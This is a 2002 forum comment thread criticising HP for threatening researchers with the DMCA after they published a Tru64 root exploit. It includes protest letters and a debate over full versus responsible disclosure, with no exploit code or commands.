      I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.

      Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.

      Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.

      This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.

      I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to recommend that anyone give their money to Hewlett Packard.

      Looking forward to your response.

      [Name Removed]
  • by ewhac ( 5844 ) on Tuesday July 30, 2002 @09:04PM (#3983092) Homepage Journal

    HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."

    As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.

    Schwab

  • by shokk ( 187512 ) <ernieoporto AT yahoo DOT com> on Tuesday July 30, 2002 @09:06PM (#3983102) Homepage Journal
    For those of you who are HPaq-ese impaired, here is the message:

    Dear HPaq customers,
    We thank you for having purchased our products in the past, but now that we have finalized our merger and cashed our options, we have lost our minds and come to the boggling conclusion that we don't want your money anymore. Please do not buy our products because honestly you can't trust us to inform you when there is a defect with our product. This includes any servers and handhelds our merger partner might peddle, printers, or whatever the hell it is these people do. As a sign of our gratitude for your service, we will be providing each future customer with a free Berber mousepad under which you can sweep any problems you discover. If you believe the problem doesn't exist, and we believe the problem doesn't exist, then we can work together to warp reality and drive customers away like poor starving slobs on the street corner to a free luncheon. Personally, I don't recommend you use these things in anything that might risk a human life or attempt to improve society in any way. Heck, I wouldn't run my porn servers on this crap. Well, gotta run, my coke dealer is here. And don't forget to F off!

    P.S. - Don't unravel the mousepad to see how it's made or we'll sue your ass into orbit under the DMCA.
  • What a perfect example - a really easy to demonstrate abuse that the DMCA allows. Hell, I could show this case to my non-techie relatives, and they'd understand just how wrong it is. Go HP - this type of bullying helps more than 10 highly paid lobbyists.
  • by aebrain ( 184502 ) <aebrain@gmail.com> on Tuesday July 30, 2002 @09:20PM (#3983183) Homepage Journal

    Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.

  • Dear Ms. Fiorina (Score:5, Interesting)

    by Gerdts ( 125105 ) on Tuesday July 30, 2002 @09:25PM (#3983214)
    Posted at http://www.hp.com/hpinfo/execteam/email/fiorina/index.htm [hp.com]

    I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.

    The first issue is HP's request that Bruce Perens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.

    The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.

    Please reconsider your decision to use the Digital Millennium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.

    I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.

  • by richieb ( 3277 ) <richieb@gmai l . com> on Tuesday July 30, 2002 @09:52PM (#3983376) Homepage Journal
    Frankly, I think that all the security experts should stop looking at Tru64 and just publicize the fact that they don't recommend it for uses where security is required.

    Let the crackers have it.

  • by jsse ( 254124 ) on Tuesday July 30, 2002 @11:39PM (#3983812) Homepage Journal
    Just in case a few of us here don't know about him: you can find his homepage here [perens.com], and in his Bio [perens.com] you can find:

    " Hewlett-Packard Corporation - 2000 to Present

    Senior strategist, Linux and Open Source. I am the first Open Source evangelist to gain a role in top management of a multi-Billion-dollar corporation. On the org chart there are only three people between me and the CEO - a general manager, a vice president, and a president. Among my assignments is to challenge HP management."

    So he's in position to speak up in this case.

    Note: I don't know if it's redundant, but I'm sure some people would like to know. I don't ask for any mod points.
  • by jsse ( 254124 ) on Wednesday July 31, 2002 @12:36AM (#3984014) Homepage Journal
    I can see it here: the US Government is progressively inventing laws that ensure:

    Only the Government can investigate crimes.
    Only the Government can test, examine, and uncover defects in consumer products.
    Only the Government can perform reverse engineering on anything.
    Only the Government is allowed to use top-grade encryption.
    The scope of Free Speech is defined by senators, and it happens that no constitutional rights are being intruded upon.

    That's to say, US would become a country where citizens, by laws, SHOULD trust the Government and any questions on the already established laws and regulations are prohibited.

    What's wrong with the picture? I don't know, but I've read a novel book about a country whose government has absolute power over their citizens and no citizen is allowed to question the decision of the government. This government does not use any military power or violence to control their citizens, but by laws.

    IIRC at the end of this story all the citizens end up living in an array of big tubes of liquid, and the rest of the rebels are either jailed (brains separated from their bodies) or terminated (becoming food for others). It's like The Matrix, but this time some humans control everything.

    ....Imagine, no violence, no crime, no hunger...a perfect world!
  • by Sean Clifford ( 322444 ) on Wednesday July 31, 2002 @12:40AM (#3984022) Journal
    Well, then. This clearly demonstrates why *not* to use HP's Unix in your shop; I won't use it in mine. Nor will I use their software or services - you can't trust them. This stupid insular policy against public disclosure only ensures that (a) exploits aren't known, and (b) aren't patched, and (c) cannot be defended against.

    Don't say it...don't say it...I'm warning you...

    Use Linux.

    Damn, I said it.

    Why the fuck don't people want exploits fully disclosed? Sure, I don't have a problem with waiting a week or so to give a team/vendor (yes, even Microsoft) a chance to roll out a patch before making it public. It's a courtesy, not a necessity.

    <rant />
    Clearly some sort of political action is required. I suggest:

    1. The DMCA needs to be repealed or ruled unconstitutional. Hopefully the ACLU or the EFF will take a case that'll get us there. Or some rich philanthropist geek could 'violate' it by exercising their constitutional rights. But the best ploy is for every one of *us* to contact (visit,snailmail,fax,call,email) 'our' reps in the House [house.gov] and Senate [senate.gov], rationally outline our objections, and protest like hell if they don't. Civil disobedience, etc.

    2. Abolish corporate personhood (same methods).

    3. Abolish the lobby industry.

    4. Abolish campaign finance. Make it publicly funded, free TV-radio spots (public airwaves) equally distributed among ballot-qualified candidates.

    We've let corporations have far too much swing. I'm all for making a buck, but Jesus F***ing Christ...

  • by LordNimon ( 85072 ) on Wednesday July 31, 2002 @12:45AM (#3984037)
    This is a letter I just sent to my Representative and Senators. Permission is given to anyone who wants to use this text to send a similar letter.

    Today I read an article on news.com (http://news.com.com/2100-1023-947325.html) that Hewlett-Packard has intended to use the Digital Millennium Copyright Act (DMCA) to punish a company that has released information about a security vulnerability in an HP product. For quite some time I have been telling you that the DMCA is a bad law that needs to be repealed, and this is just more evidence to that effect. HP has known about this vulnerability for a year, but has chosen to do nothing to fix it.

    HP's action could set a precedent that would stifle technology research. Companies would be free to release broken technologies that would eventually be used in high-security environments. Anyone who attempted to test the strengths of these products would be branded a criminal.

    HP's customers and the American public deserve to know about security issues in HP's products. Withholding such information is just like the accounting scandals that have been rampant in recent times. Insecure technology is a weapon that hackers and terrorists can use against us. So when an American company decides to hide behind an American law rather than fix its products, our politicians need to re-examine that law.

    I urge you to sponsor legislation that will repeal the DMCA. Americans deserve better. Please write back to me and let me know that you support my fair use rights in a digital world, and that you'll be working to repeal the DMCA.

  • by matthew_gream ( 113862 ) on Wednesday July 31, 2002 @04:45AM (#3984751) Homepage

    I think HP is wrong with its DMCA style threats, because they are not appropriate. However, I can sympathise with HP and understand why they may have "lashed out". I think the hacker in question was wrong to irresponsibly post the exploit for script kiddies to start playing with fire. For all the debate about various sorts of disclosure processes, it's quite clear that this approach potentially has a high impact upon any deployed systems and gives no time for either the vendors or the administrators to take action. This is just not a responsible real-world approach to dealing with security issues.

    • The problem is that this gives a rise to the other question... How long to wait before making something public?

      The person that made the information public knew that HP has had the information SEVERAL MONTHS before making the exploit public.

      It's true that it may have been better to contact CERT first (note: HP already knew); post to bugtraq, but DESCRIBE the issue and not post the exploit... THEN once the PUBLIC description is made {and still no response from HP} [I say maybe give HP 14 working days] only then post the exploit as was done..
